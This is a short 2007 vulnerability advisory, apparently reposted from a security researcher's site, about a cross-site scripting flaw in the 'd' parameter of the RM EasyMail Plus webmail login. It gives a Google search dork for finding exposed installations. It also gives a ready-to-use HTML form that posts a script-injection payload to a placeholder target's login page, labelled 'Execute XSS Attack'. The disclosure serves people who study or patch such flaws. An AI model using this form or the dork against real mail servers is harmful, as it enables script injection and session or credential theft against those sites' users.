RM EasyMail Plus - Cross-Site Scripting ExploitMonday, 21 May 2007The variable 'd' (when used with POST and GET) is vulnerable to Cross-Site Scripting attacks.
Vulnerable: RM EasyMail Plus (other versions should also be vulnerable)
Google d0rk: intitle:"Powered by RM EasyMail Plus"
John Martinelli
john@martinelli.com
RedLevel Security
RedLevel.org
May 6th, 2007
!-->
<html>
<head><title>RM EasyMail Plus - Cross-Site Scripting Exploit</title><body>
<center><br><br><font size=4>RM EasyMail Plus - Cross-Site Scripting Exploit</font><br><font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a> of <a href="http://redlevel.org">RedLevel Security</a><br><br>Google d0rk: <a href="http://www.google.com/search?hl=en&q=%22powered+by+rm+easymail+plus%22">intitle:"Powered by RM EasyMail Plus"</a></font><br>
<br><br>
<form action="http://mail.target.com/cp/ps/Main/login/Login" method="post">
<input type=hidden name="s" value="1">
<input name="d" size=75 value=">'><script>alert(1);</script>">
<input type=submit value="Execute XSS Attack" class="button">
</form>
Original article:
http://redlevel.org/wp-content/uploads/2007/05/rmeasymail.txt
Share this content:
|